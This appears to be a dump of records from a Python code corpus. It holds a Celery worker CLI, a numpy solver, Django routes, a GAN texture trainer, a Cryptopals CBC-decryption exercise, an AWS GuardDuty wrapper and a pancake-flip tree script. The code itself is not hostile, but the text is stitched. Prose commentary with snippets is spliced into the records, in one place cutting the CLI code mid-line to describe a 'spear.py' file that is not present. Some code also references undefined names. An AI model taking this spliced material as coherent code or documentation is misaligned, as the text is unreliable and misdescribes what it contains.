(3394)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.macosx-10.15-x86_64/egg/wavescli/cli.py\n# Compiled at: 2020-04-24 10:20:39\n# Size of source mod 2**32: 4136 bytes\nimport os, json, yaml, subprocess, click\nfrom wavescli import VERSION\n\n@click.group()\n@click.pass_context\n@click.version_option(version=VERSION)\ndef main(ctx):\n WAVES_URL = os.environ.get('WAVES_URL')\n API_KEY = os.environ.get('API_KEY')\n ctx.obj['config'] = {'WAVES_URL':WAVES_URL, \n 'API_KEY':API_KEY}\n\n\n@main.command(name='create')\n@click.option('--workflow/--businesstask', required=True, default=True)\n@click.argument('yaml_filepath', required=True, type=(click.File('r')))\n@click.pass_context\ndef create(ctx, workflow, yaml_filepath):\n \"\"\"\n Create a workflow/business task from a YAML file\n \"\"\"\n definition_str = yaml_filepath.read()\n if workflow and definition_str:\n click.secho(' Creating workflow...', fg='green')\n output = ctx.obj.client.create_workflow(definition_str)\n else:\n if not workflow:\n if definition_str:\n click.secho(' Creating businesstask...', fg='green')\n output = ctx.obj.client.register_businesstask(definition_str)\n click.secho(json.dumps(output, indent=2, sort_keys=True), 
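The `draw()` method in `spear.py` above positions the sprite by rotating a fixed-length vector with `sin`/`cos` (at `angle + 90` for the carry position, and along `angle` during the thrust animation). The same geometry as a pure function, a minimal sketch with no pygame dependency (note pygame's y axis grows downward, hence the `cos` term on y):

```python
import math

def offset(x, y, angle_deg, distance):
    # Point `distance` units away from (x, y) in the direction angle_deg.
    rad = math.radians(angle_deg)
    return x + math.sin(rad) * distance, y + math.cos(rad) * distance

# At angle 0 the offset points straight down the y axis.
assert offset(0.0, 0.0, 0.0, 80) == (0.0, 80.0)
```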
fg='yellow')\n\n\n@main.command(name='publish')\n@click.option('--businesstask', is_flag=True)\n@click.argument('yaml_filepath', required=True, type=(click.File('r')))\n@click.pass_context\ndef publish(ctx, businesstask, yaml_filepath):\n \"\"\"\n Publish a business task from a YAML file\n \"\"\"\n definition_str = yaml_filepath.read()\n if businesstask:\n if definition_str:\n click.secho(' Publishing businesstask...', fg='green')\n new_btask = ctx.obj.client.publish_businesstask(definition_str)\n click.secho(json.dumps(new_btask, indent=2, sort_keys=True), fg='yellow')\n\n\n@main.command(name='worker')\n@click.option('--start/--stop', required=True, default=True)\n@click.option('--tasks', required=False, help='The path for the business task tasks.py file')\n@click.argument('yaml_filepath', required=True, type=(click.File('rb')))\ndef worker(start, tasks, yaml_filepath):\n \"\"\"\n Start/Stop worker to receiving messages from Waves broker\n \"\"\"\n definition = yaml.load(yaml_filepath, Loader=(yaml.FullLoader))\n if start and definition:\n start_worker(definition, tasks)\n else:\n stop_worker(definition, tasks)\n\n\ndef start_worker(definition, tasks):\n task_name = definition.get('name')\n task_version = definition.get('version', 'latest')\n tasks_module = definition.get('tasks_module', 'waves.btasks.app')\n if tasks:\n tasks_module = tasks\n default_queue = 'wv_{}@{}'.format(task_name, task_version)\n loglevel = 'INFO'\n concurrency = os.environ.get('CELERY_CONCURRENCY', 1)\n queue = os.environ.get('QUEUE_NAME', default_queue)\n worker_name = os.environ.get('WORKER_PRIVATE_IP', '%h')\n cmd = 'celery -A {} worker --hostname {}@{} --loglevel={} --task-events -Ofair -c {} -Q {}'.format(tasks_module, task_name, worker_name, loglevel, concurrency, queue)\n click.secho((' ...Starting worker\\n{}'.format(cmd)), fg='yellow')\n subprocess.call(cmd.split(' '))\n\n\ndef stop_worker(definition, tasks):\n tasks_module = definition.get('tasks_module', 'waves.btasks.app')\n if tasks:\n tasks_module = tasks\n cmd = 'celery -A {} control shutdown'.format(tasks_module)\n click.secho((' ...Stopping worker\\n{}'.format(cmd)), fg='yellow')\n subprocess.call(cmd.split(' '))\n\n\n@main.command(name='init')\n@click.option('--project', type=click.Choice(['New', 'Existing'], case_sensitive=False),\n prompt=True)\ndef worker_init(project):\n \"\"\"\n Add waves files\n cookiecutter https://gitlab.spacetimeanalytics.com/waves/bt-template.git -c existing\n \"\"\"\n click.secho((' ...project{}'.format(project)), fg='yellow')\n template = 'https://gitlab.spacetimeanalytics.com/waves/bt-template.git'\n existing_project = project.upper() == 'EXISTING'\n cmd = 'cookiecutter {}{}'.format(template, ' -f -c existing' if existing_project else '')\n click.secho(\" ...Initializing Waves' files\\n\", fg='yellow')\n subprocess.call(cmd.split(' '))","sub_path":"pycfiles/wavescli-0.0.42-py3.7/cli.cpython-37.py","file_name":"cli.cpython-37.py","file_ext":"py","file_size_in_byte":4342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"355241241","text":"#solving a set of linear equations using python library\n\nimport numpy as np\n\nA=np.array([[1,0.67,0.33],[0.45,1,0.55],[0.67,0.33,1]])\nB=np.array([2,2,2])\nx=np.linalg.solve(A,B)\nprint(x)\n\n\n\n\n","sub_path":"linalg_solve.py","file_name":"linalg_solve.py","file_ext":"py","file_size_in_byte":189,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"28578264","text":"from 
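`linalg_solve.py` above solves `Ax = B` directly with `np.linalg.solve`. A quick sanity check, shown here as an illustrative addition, is to substitute the solution back and compare `A @ x` against `B` within floating-point tolerance:

```python
import numpy as np

A = np.array([[1, 0.67, 0.33], [0.45, 1, 0.55], [0.67, 0.33, 1]])
B = np.array([2, 2, 2])
x = np.linalg.solve(A, B)
assert np.allclose(A @ x, B)   # residual check: the solution satisfies Ax = B
```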
django.urls import path\nfrom . import views\nfrom django.contrib.auth import views as auth_views\n\napp_name = 'movieee'\nurlpatterns = [\n path('', views.index, name='index'),\n path('posts/new/', views.posts_new, name='posts_new'),\n path('posts//', views.posts_detail, name='posts_detail'),\n path('posts//edit/', views.posts_edit, name='posts_edit'),\n path('posts//delete/', views.posts_delete, name='posts_delete'),\n path('posts//comments_add/', views.comments_add, name='comments_add'),\n]","sub_path":"movieee/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"259880980","text":"import argparse\nimport json\nimport numpy as np\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport os\nimport random\nimport sys\nimport time\nimport yaml\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.parallel\nimport torch.backends.cudnn as cudnn\nimport torch.optim as optim\nimport torch.utils.data\nimport torchvision.transforms as transforms\nimport torchvision.utils as vutils\n\nfrom ailive import DEVICE\nfrom ailive.data import TextureDataset, LiveDataset\nfrom ailive.models import Generator, Discriminator, setWave, setNoise\nfrom ailive.config import Struct\nfrom ailive.generate import generate\nfrom ailive.config import cf\n\nfrom shu import shu\nfrom shu.core.db import db\n\n\nmatplotlib.use('Agg')\ncudnn.benchmark = True\n\n\nclass Logger:\n \"\"\"\n Class to log weights during training.\n :param model: model whose weights should be logged\n :param save_: path to checkpoint directory\n \"\"\"\n def __init__(self,\n model,\n save_):\n\n self.model = model\n self.save_ = save_\n self.variables = [x for x in self.model.state_dict().keys()]\n\n def init(self):\n \"\"\"\n Initialize logger by setting up weight dictionaries\n \"\"\"\n self.save_dict = dict(zip(self.variables,\n [[] for _ in self.variables]))\n self.index_dict = {}\n\n for var_ in self.variables:\n tensor_ = self.model.state_dict()[var_].view(-1)\n len_ = len(tensor_)\n ix = [random.choice(range(len_)) for _ in range(5)]\n self.index_dict[var_] = ix\n\n def dump(self):\n \"\"\"\n Print logger to .json file with path in self.save_\n \"\"\"\n with open(self.save_ + \"/weights.json\", \"w\") as f:\n json.dump(self.save_dict, f)\n\n def log(self):\n \"\"\"\n Log weights into weight dictionaries at some point in training.\n \"\"\"\n for var_ in self.variables:\n tensor_ = self.model.state_dict()[var_].view(-1)\n to_append = [float(tensor_[choice])\n for choice in self.index_dict[var_]]\n self.save_dict[var_].append(to_append)\n if len(self.save_dict[var_]) > 1000:\n self.save_dict[var_] = \\\n self.save_dict[var_][-1000:]\n\n\ndef weights_init(m):\n classname = m.__class__.__name__\n if classname.find('Conv') != -1:\n m.weight.data.normal_(0.0, 0.02)\n elif classname.find('BatchNorm') != -1:\n m.weight.data.normal_(1.0, 0.02)\n m.bias.data.fill_(0)\n\n\ndef get_configs(path, dataroot, name):\n with open(path) as f:\n cf = yaml.load(f, Loader=yaml.FullLoader)\n\n cf['train']['dataroot'] = dataroot\n return Struct(**cf['train']), \\\n Struct(**cf['generator']), \\\n Struct(**cf['discriminator'])\n\n\nclass Trainer:\n def __init__(self, shu_name, train_cf, gen_cf, dis_cf):\n\n if shu_name[-1] != '/':\n shu_name += '/'\n self.shu_name = shu_name\n self.train_cf = train_cf\n self.gen_cf = gen_cf\n self.dis_cf = dis_cf\n self.epoch = 0\n self.it = 0\n self.glance_dir = 'glances/' + self.shu_name\n\n 
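The `Logger` class in `train.py` above samples a handful of random flat indices per parameter tensor once, then appends those weight values on every `log()` call, keeping only the last 1000 entries. The core idea, framework-free (an illustrative sketch: numpy arrays stand in for the model's `state_dict` tensors, and indices are drawn without replacement here, unlike the repeated `random.choice` above):

```python
import random
import numpy as np

class WeightSampler:
    def __init__(self, params, k=5, keep=1000):
        self.params = params                        # name -> np.ndarray
        self.keep = keep
        # Fix k random flat indices per tensor at construction time.
        self.ix = {name: random.sample(range(p.size), k)
                   for name, p in params.items()}
        self.history = {name: [] for name in params}

    def log(self):
        for name, p in self.params.items():
            flat = p.reshape(-1)
            self.history[name].append([float(flat[i]) for i in self.ix[name]])
            self.history[name] = self.history[name][-self.keep:]   # bounded history

sampler = WeightSampler({"w": np.zeros((3, 4))})
sampler.log()
assert len(sampler.history["w"][0]) == 5
```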
os.system(f'mkdir -p {self.glance_dir}')\n\n self._init_seed()\n self.transform = self._init_transforms()\n if train_cf.fRec > 0:\n self.recon = True\n self.netD, self.netG, self.netR = self._init_model()\n else:\n self.recon = False\n self.netD, self.netG = self._init_model()\n self._init_weights()\n if self.train_cf._get('load', False):\n self._load_weights()\n self.optimizerD, self.optimizerG = self._get_optimizers()\n self.dataloader, self.dataset, self.cdataset = self._get_data()\n self.criterion = nn.BCELoss()\n self.logger = Logger(self.netG, 'checkpoints/' + self.shu_name)\n self.logger.init()\n\n nz_other = train_cf.imageSize // 2 ** gen_cf.nDep\n self.noise = torch.FloatTensor(train_cf.batchSize,\n gen_cf.nz,\n nz_other,\n nz_other).to(DEVICE)\n self.noise = setNoise(self.noise, nGL=self.gen_cf.nGL)\n\n self.label = torch.FloatTensor(train_cf.batchSize).to(DEVICE)\n self.REAL_LABEL = 1\n self.FAKE_LABEL = 0\n\n def _init_seed(self):\n random.seed(self.train_cf._get('manualSeed', int(time.time())))\n torch.manual_seed(self.train_cf._get('manualSeed', int(time.time())))\n\n def _init_transforms(self):\n return transforms.Compose([\n transforms.RandomCrop(self.train_cf.imageSize),\n transforms.ToTensor(),\n transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))\n ])\n\n def _init_model(self):\n netD = Discriminator(self.dis_cf.ndf, self.gen_cf.nDep)\n netG = Generator(\n self.gen_cf.ngf,\n self.gen_cf.nDep,\n self.gen_cf.nz,\n self.gen_cf.nGL,\n Ctype=self.gen_cf.Ctype,\n nPeriodic=self.gen_cf.nperiodic,\n nc=self.gen_cf.nc,\n Kperiodic=self.gen_cf.Kperiodic\n )\n netD.to(DEVICE)\n netG.to(DEVICE)\n if self.recon:\n netR = Reconstructor(gen_cf.ndf, gen_cf.nDep, gen_cf.nGL)\n netR.to(DEVICE)\n return netD, netG, netR\n else:\n return netD, netG\n\n def _init_weights(self):\n self.netD.apply(weights_init)\n self.netG.apply(weights_init)\n if self.recon:\n self.netR.apply(weights_init)\n\n def _load_weights(self):\n self.netG.load_state_dict(torch.load(train_cf.load))\n\n def _get_optimizers(self):\n optimizerD = optim.Adam(\n self.netD.parameters(),\n lr=self.train_cf.lr,\n betas=(self.train_cf.beta1, 0.999)\n )\n\n if self.recon:\n optimizerG = optim.Adam(\n list(self.netG.parameters()) + list(self.netR.parameters()),\n lr=self.train_cf.lr,\n betas=(self.train_cf.beta1, 0.999)\n )\n else:\n optimizerG = optim.Adam(\n self.netG.parameters(),\n lr=self.train_cf.lr,\n betas=(self.train_cf.beta1, 0.999)\n )\n return optimizerD, optimizerG\n\n def _get_data(self):\n dataset = TextureDataset(self.train_cf.dataroot, self.transform)\n cdataset = LiveDataset(self.train_cf.audio_path,\n self.train_cf.batchSize)\n dataloader = torch.utils.data.DataLoader(\n dataset, batch_size=self.train_cf.batchSize,\n shuffle=True,\n num_workers=1\n )\n return dataloader, dataset, cdataset\n\n def _take_discriminator_step(self):\n self.netD.zero_grad()\n output = self.netD(self.text)\n errD_real = \\\n self.criterion(output, output.detach() * 0 + self.REAL_LABEL)\n errD_real.backward()\n self.D_x = output.mean().item()\n with torch.no_grad():\n fake = self.netG(self.noise)\n output = self.netD(fake.detach())\n errD_fake = \\\n self.criterion(output, output.detach() * 0 + self.FAKE_LABEL)\n errD_fake.backward()\n self.D_G_z1 = output.mean().item()\n errD = errD_real + errD_fake\n self.optimizerD.step()\n\n def _take_generator_step(self):\n self.optimizerG.zero_grad()\n self.content = self.cdataset.next().to(DEVICE)\n self.noise = setNoise(self.noise, audio=self.content, nGL=self.gen_cf.nGL)\n self.fake = 
self.netG(self.noise)\n output = self.netD(self.fake)\n if self.recon:\n recZ = self.netR(self.fake)\n errR = \\\n (((recZ - self.noise[:, :self.gen_cf.nGL, :1, :1])) ** 2).mean()\n else:\n errR = self.noise.sum() * 0\n errG = self.criterion(output, output.detach() * 0 + self.REAL_LABEL) + \\\n self.train_cf.fRec * errR\n errG.backward()\n D_G_z2 = output.mean().item()\n self.optimizerG.step()\n\n def _make_glances(self):\n\n vutils.save_image(\n self.text * 0.5 + 0.5,\n f'{self.glance_dir}/real_textures.jpg',\n normalize=False\n )\n vutils.save_image(\n self.content * 0.5 + 0.5,\n f'{self.glance_dir}/real_contents.jpg',\n normalize=False\n )\n vutils.save_image(\n self.fake * 0.5 + 0.5,\n f'{self.glance_dir}/tex_{self.epoch:03}.jpg',\n normalize=False\n )\n\n n2 = self.noise[:4].repeat(1, 1, 3, 3)\n n2 = setNoise(n2, audio=self.content[:4], nGL=self.gen_cf.nGL)\n self.netG.eval()\n with torch.no_grad():\n fake2 = self.netG(n2)\n self.netG.train()\n vutils.save_image(\n fake2 * 0.5 + 0.5,\n f'{self.glance_dir}/tex2_{self.epoch:03}.jpg',\n normalize=False,\n )\n\n glance = {\"tex\": f'/static/{self.glance_dir}tex_{self.epoch:03}.jpg'}\n print(f'GLANCE 0 iteration: {self.it}; data: {json.dumps(glance)};')\n glance = {\"tex2\": f'/static/{self.glance_dir}tex2_{self.epoch:03}.jpg'}\n print(f'GLANCE 1 iteration: {self.it}; data: {json.dumps(glance)};')\n\n if self.gen_cf.nperiodic > 0:\n n2 = setWave(n2, self.gen_cf.nperiodic, self.netG)\n vutils.save_image(\n n2.view(-1, 1, n2.shape[2], n2.shape[3]) * .5 + 0.5,\n f'{self.glance_dir}/noise2_{self.epoch:03}.jpg',\n normalize=False,\n )\n\n glance = {\"noise2\":\n f'/static/{self.glance_dir}noise2_{self.epoch:03}.jpg'}\n print(f'GLANCE 2 iteration: {self.it}; data: {json.dumps(glance)};')\n\n waves = n2[:, n2.shape[1] - self.gen_cf.nperiodic:].contiguous()\n waves = waves.view(-1, 1, n2.shape[2], n2.shape[3])\n vutils.save_image(\n waves * .5 + 0.5,\n f'{self.glance_dir}/waves_{self.epoch:03}.jpg',\n normalize=False,\n )\n glance = {\"waves\":\n f'/static/{self.glance_dir}waves_{self.epoch:03}.jpg'}\n print(f'GLANCE 3 iteration: {self.it}; data: {json.dumps(glance)};')\n\n def _save_model(self):\n print('saving...')\n torch.save(self.netG.state_dict(),\n f'checkpoints/{self.shu_name}/model.pt')\n self.logger.dump()\n\n def _do_iteration(self, batch):\n content = self.cdataset.next().to(DEVICE)\n self.text, _ = batch\n self.text = self.text.to(DEVICE)\n self.noise = setNoise(self.noise, audio=content, nGL=self.gen_cf.nGL)\n\n self._take_discriminator_step()\n self._take_generator_step()\n\n if self.it % 25 == 0:\n self.logger.log()\n\n if self.it % 5 == 0:\n print(f'TRAIN iteration: {self.it}; epoch: {self.epoch}; '\n f'd_loss: {self.D_x}; g_loss: {self.D_G_z1};')\n\n self.it += 1\n\n def _do_epoch(self):\n for batch in self.dataloader:\n self._do_iteration(batch)\n if self.epoch % 5 == 0:\n self._make_glances()\n self._save_model()\n self.epoch += 1\n\n def _create_video(self):\n generate(self.gen_cf, cf.audio, self.shu_name)\n if self.gen_cf.nperiodic > 0:\n n = 4\n else:\n n = 2\n to_print = json.dumps({'example': '/static/' + self.glance_dir + 'example.mp4'})\n print(f'GLANCE {n} iteration: {self.it}; data: {to_print};')\n\n def _push_data(self):\n version = str(db.instances.find_one({'name': 'ailive'})['version'])\n print('pushing training data to ailive server')\n shu.files.sync(version)\n shu.files.checkpoints(version, exclude='\"*\"', include='\"*/log\"')\n shu.files.data(version, exclude='\"data/audio/*\"')\n\n ims = 
os.listdir('data/images/' + self.shu_name)\n ims = ['/static/images/' + x for x in ims]\n\n r = {'name': self.shu_name, 'examples': ims, 'info': {}, 'project': 'ailive'}\n db.datasets.replace_one({'name': self.shu_name}, r, upsert=True)\n\n\n def train(self):\n for _ in range(self.train_cf.n_epochs):\n self._do_epoch()\n self._create_video()\n self._push_data()\n","sub_path":"ailive/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":12403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"183162534","text":"import base64\nimport hashlib\nfrom Crypto.Cipher import AES\nfrom Crypto import Random\n\nkey = \"YELLOW SUBMARINE\"\nblock_size = 16\n\n\ndef xor(s1,s2):\n\treturn ''.join(chr(a ^ b) for a,b in zip(s1,s2))\n\ndef decrypt(text):\n\tobj = AES.new( key , AES.MODE_ECB)\n\tplaintext = obj.decrypt(text)\n\treturn plaintext\n\t\nplaintext = \"\"\n\nwith open (\"C10.txt\", \"r\") as myfile:\n ciphertext = myfile.read().replace(\"\\n\",\"\")\n\nciphertext = base64.b64decode( ciphertext.rstrip()) # convert to ascii\nprint(len(ciphertext))\nprint( ciphertext[:5] )\n\nif len(ciphertext)%16!=0:\n\tprint(\"Error\")\nIV = (\"0\"*16).encode(\"ASCII\")\n\nwhile len(ciphertext)!=0:\n\tnext_block = ciphertext[:16]\n\tmi_c1 = decrypt(next_block)\n\tplaintext += xor(mi_c1,IV)\n\tIV = next_block\n\tciphertext = ciphertext[16:]\nplaintext += \"\\n\"\n\nprint(plaintext)\n\n","sub_path":"Crypto/Pals/C10.py","file_name":"C10.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"431846075","text":"#!/usr/bin/python\n# -*- codding: utf-8 -*-\nimport os\nimport sys\nsys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__))))\nfrom common.execute_command import write_two_parameter\n\n# url : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/guardduty/update-ip-set.html\nif __name__ == '__main__':\n \"\"\"\n\tcreate-ip-set : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/guardduty/create-ip-set.html\n\tdelete-ip-set : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/guardduty/delete-ip-set.html\n\tget-ip-set : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/guardduty/get-ip-set.html\n\tlist-ip-sets : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/guardduty/list-ip-sets.html\n \"\"\"\n\n parameter_display_string = \"\"\"\n # detector-id : The detectorID that specifies the GuardDuty service whose IPSet you want to update.\n # ip-set-id : The unique ID that specifies the IPSet that you want to update.\n \"\"\"\n add_option_dict = {}\n add_option_dict[\"parameter_display_string\"] = parameter_display_string\n # ex: add_option_dict[\"no_value_parameter_list\"] = \"--single-parameter\"\n write_two_parameter(\"guardduty\", \"update-ip-set\", \"detector-id\", \"ip-set-id\", add_option_dict)\n","sub_path":"guardduty_write_2/ip-set_update.py","file_name":"ip-set_update.py","file_ext":"py","file_size_in_byte":1293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"513453965","text":"class Tree(object):\n def __init__(self, name='root', children=None):\n self.name = name\n self.children = []\n if children is not None:\n for child in children:\n self.add_child(child)\n\n def __repr__(self):\n return self.name\n\n def add_child(self, node):\n assert isinstance(node, Tree)\n 
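`C10.py` above implements CBC decryption by hand: each ciphertext block is ECB-decrypted and then XORed with the previous ciphertext block (the IV for the first). One caveat: the file's IV is sixteen ASCII `'0'` characters (byte 0x30), whereas the Cryptopals exercise specifies zero bytes (`\x00`), which affects only the first block. A bytes-throughout sketch of the same scheme (requires pycryptodome; key and IV values are the caller's to supply):

```python
from Crypto.Cipher import AES

def cbc_decrypt(ciphertext: bytes, key: bytes, iv: bytes) -> bytes:
    assert len(ciphertext) % 16 == 0
    ecb = AES.new(key, AES.MODE_ECB)
    out, prev = b"", iv
    for i in range(0, len(ciphertext), 16):
        block = ciphertext[i:i + 16]
        # CBC: plaintext block = ECB-decrypt(block) XOR previous ciphertext block.
        out += bytes(a ^ b for a, b in zip(ecb.decrypt(block), prev))
        prev = block
    return out
```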
self.children.append(node)\n\n\ndef generating_tree_new(node, current_depth):\n instances = 1\n if current_depth == 18:\n return node\n else:\n for flip in range(0, pancakes):\n flippancake(node, instances)\n instances = instances + 1\n for children in node.children:\n generating_tree_new(children, current_depth + 1)\n return node\n\n\ndef flippancake(tree, instance):\n original_name = tree.name\n temp_name = \"\"\n end_name = \"\"\n count = 0\n for j in range(0, instance):\n for k in range(1, len(original_name)):\n if original_name[k] == 'b':\n count = count + 1\n else:\n break\n count = count + 1\n temp_name = original_name[0:count]\n original_name = original_name[count:]\n if len(temp_name) == sides:\n temp_name = temp_name[0]\n else:\n temp_name = temp_name + 'b'\n end_name = temp_name + end_name\n temp_name = \"\"\n count = 0\n end_name = end_name + original_name\n end_name = Tree(end_name)\n tree.add_child(end_name)\n return tree\n\n\ndef generating_tree(node, current_depth):\n instances = 0\n count = 0\n # Checking if we are done doing the number of vertices and if so we just return the node we are at.\n if current_depth == 18:\n return node\n # iterate over the name\n for j in range(0, len(node.name)):\n # current implementation needs to be changed as this only works for 2 pancakes, because\n # when you have more than 2 pancakes you have to flip each time that it's not the top instance.\n # for instance if you had 3 pancakes with 3 sides and you are at state \"12b3b\" then it's children would be\n # \"1b2b3b\", \"2bb1b3b\", \"3bb2bb1b\"\n # so for now this will only work for 2 pancakes\n # This means we are at the first flip of the pancake so only doing 12 becoming 1b2\n if node.name[j] != \"b\" and instances == 0:\n # This just shows we are not at the first flip of the pancake\n instances += 1\n subname = node.name[j + 1:]\n for k in range(0, len(subname)):\n if subname[k] != \"b\":\n break\n else:\n count += 1\n if count == sides - 1:\n count = 0\n new_name = node.name[:j + 1] + node.name[j + sides:]\n new_name = Tree(new_name)\n new_name = generating_tree(new_name, current_depth + 1)\n node.add_child(new_name)\n else:\n count = 0\n new_name = node.name[:j + 1] + \"b\" + node.name[j + 1:]\n new_name = Tree(new_name)\n new_name = generating_tree(new_name, current_depth + 1)\n node.add_child(new_name)\n elif node.name[j] != \"b\" and instances != 0:\n subname = node.name[j + 1:]\n for k in range(0, len(subname)):\n if subname[k] != \"b\":\n break\n else:\n count += 1\n if count == sides - 1:\n # here\n new_name = node.name[:j + 1] + node.name[j + sides:]\n new_name = new_name[j:] + new_name[:j]\n count = 0\n subname = new_name[2:]\n for l in range(0, len(subname)):\n if subname[l] != \"b\":\n break\n else:\n count += 1\n if count == sides - 1:\n # blarg\n count = 0\n new_name = new_name[:1 + 1] + new_name[1 + sides:]\n new_name = Tree(new_name)\n new_name = generating_tree(new_name, current_depth + 1)\n node.add_child(new_name)\n else:\n # thing\n count = 0\n new_name = new_name[:1 + 1] + \"b\" + new_name[1 + 1:]\n new_name = Tree(new_name)\n new_name = generating_tree(new_name, current_depth + 1)\n node.add_child(new_name)\n else:\n # wow\n new_name = node.name[:j + 1] + \"b\" + node.name[j + 1:]\n new_name = new_name[j:] + new_name[:j]\n subname = new_name[count + sides:]\n count = 0\n for l in range(0, len(subname)):\n if subname[l] != \"b\":\n break\n else:\n count += 1\n if count == sides - 1:\n # za\n new_name = new_name[:-count]\n count = 0\n new_name = Tree(new_name)\n 
new_name = generating_tree(new_name, current_depth + 1)\n node.add_child(new_name)\n else:\n # boy\n count = 0\n new_name = new_name[:1 + 1] + new_name[1 + 1:] + \"b\"\n new_name = Tree(new_name)\n new_name = generating_tree(new_name, current_depth + 1)\n node.add_child(new_name)\n return node\n\n\ndef lengths(tree, lengthsdict, length, nodeslist, targetname):\n if targetname == tree.name:\n lengthsdict[length] = 1\n for children in tree.children:\n if children.name not in nodeslist:\n nodeslist.append(children.name)\n lengths(children, lengthsdict, 0, nodeslist, children.name)\n else:\n length = length + 1\n for children in tree.children:\n lengths(children, lengthsdict, length, nodeslist, targetname)\n if children.name not in nodeslist:\n nodeslist.append(children.name)\n lengths(children, lengthsdict, 0, nodeslist, children.name)\n\n\ndef dicupdate(dictionary):\n if dictofLengths != dictionary:\n for index in range(0, len(dictionary)):\n if dictofLengths[index] == 0 and dictionary[index] == 1:\n dictofLengths[index] = dictionary[index]\n\n\ndef printingtree(tree, length):\n print(tree.name, \"at length: \", length)\n for children in tree.children:\n print(children, \"at length: \", length + 1)\n for children in tree.children:\n printingtree(children, length + 1)\n\n\ndef checkingvalues(tree, validelements, length):\n if tree.name not in validelements:\n print(\"ERROR, ERROR, We have an error at length: \", length)\n print(tree.name)\n for children in tree.children:\n checkingvalues(children, validelements, length + 1)\n\n\ncountingthings = 0\n\n\ndef checkingchildren(tree, validthings):\n for children in tree.children:\n global countingthings\n countingthings += 1\n if children.name not in validthings[tree.name]:\n print(\"ALARM ALARM PLEASE SAVE ME\")\n for children in tree.children:\n checkingchildren(children, validthings)\n\n\ncounter = 1\n\n\ndef countchildren(tree):\n for children in tree.children:\n global counter\n counter += 1\n countchildren(children)\n\n\npancakes = input(\"Enter the number of pancakes: \")\nsides = input(\"Enter the number of Sides per Pancake: \")\nwhile type(pancakes) != int:\n pancakes = input(\"\")\npancakes = int(pancakes)\nsides = int(sides)\nroot = \"\"\nfor pancake in range(1, pancakes + 1):\n root = root + str(pancake)\nroot = Tree(root)\nprint(root.name)\nside_count = 0\ndepth = 0\nroot = generating_tree_new(root, depth)\n\n\nvalidvalues = [\"12\", \"1b2\", \"1bb2\", \"2bb1bb\", \"2b1bb\", \"21bb\", \"12b\", \"2bb1b\", \"2b1b\", \"21b\", \"12bb\", \"1b2bb\", \"1bb2bb\",\n \"2b1\", \"21\", \"2bb1\", \"1b2b\", \"1bb2b\"]\nprint(len(validvalues))\ncheckingvalues(root, validvalues, 0)\n\n#print(root.name == \"12\")\ndictofLengths = {}\nlistofnodes = [root.name]\n\nfor i in range(0, 18 + 1):\n dictofLengths[i] = 0\n\n\n# Should be 3,4,6,8,9,10,12,13,14,15,18\nfor kid in root.children:\n lengths(kid, dictofLengths, 1, listofnodes, root.name)\n# lengths(root, dictofLengths, 0, listofnodes, root.name)\ndel dictofLengths[0]\nprint(dictofLengths)\n\nlistofvalidchildren = {\"12\": [\"1b2\", \"2b1b\"],\n \"1b2\": [\"1bb2\", \"2b1bb\"],\n \"1bb2\": [\"12\", \"2b1\"],\n \"2bb1bb\": [\"21bb\", \"12\"],\n \"2b1bb\": [\"2bb1bb\", \"12bb\"],\n \"21bb\": [\"2b1bb\", \"12b\"],\n \"12b\": [\"1b2b\", \"2bb1b\"],\n \"2bb1b\": [\"21b\", \"1bb2\"],\n \"2b1b\": [\"2bb1b\", \"1bb2bb\"],\n \"21b\": [\"2b1b\", \"1bb2b\"],\n \"12bb\": [\"1b2bb\", \"21b\"],\n \"1b2bb\": [\"1bb2bb\", \"21bb\"],\n \"1bb2bb\": [\"12bb\", \"21\"],\n \"2b1\": [\"2bb1\", \"1b2bb\"],\n \"21\": 
[\"2b1\", \"1b2b\"],\n \"2bb1\": [\"21\", \"1b2\"],\n \"1b2b\": [\"1bb2b\", \"2bb1bb\"],\n \"1bb2b\": [\"12b\", \"2bb1\"]}\n\ncheckingchildren(root, listofvalidchildren)\ncountchildren(root)\nif counter == (pow(2, 19) - 1):\n print(\"ELEELELELEL\")\nelse:\n print(\"we are sad\")\n print(counter)\nprint(countingthings)\n","sub_path":"IDS/Testing Graphs 2.py","file_name":"Testing Graphs 2.py","file_ext":"py","file_size_in_byte":9577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"91297533","text":"import numpy as np\nimport warnings\n\nclass validation():\n def _validate_data(self,X,y):\n \"\"\"检查矩阵是否缺失,X的长度是否与y相等\"\"\"\n if np.isnan(X).sum() or X is None:\n raise ValueError(\"X is invalid: it must not be nan or none\")\n if np.isnan(y).sum() or y is None:\n raise ValueError(\"y is invalid: it must not be nan or none\")\n if len(X) != len(y):\n raise ValueError(\"the length of X must be equal to y\")\n \n return X,y","sub_path":"慕课/机器学习/MyML/validation.py","file_name":"validation.py","file_ext":"py","file_size_in_byte":517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"564141754","text":"import os\nimport sys\nimport libs.applibs.compendium.abstractcompendium as abstractcompendium\n\nclass HomeRepair(abstractcompendium.Compendium):\n\n def __init__(self):\n super().__init__()\n\n self.metValue = {6010 : 3.0\n ,6020 : 4.0\n ,6030 : 3.3\n ,6040 : 3.0\n ,6050 : 6.0\n ,6052 : 3.8\n ,6060 : 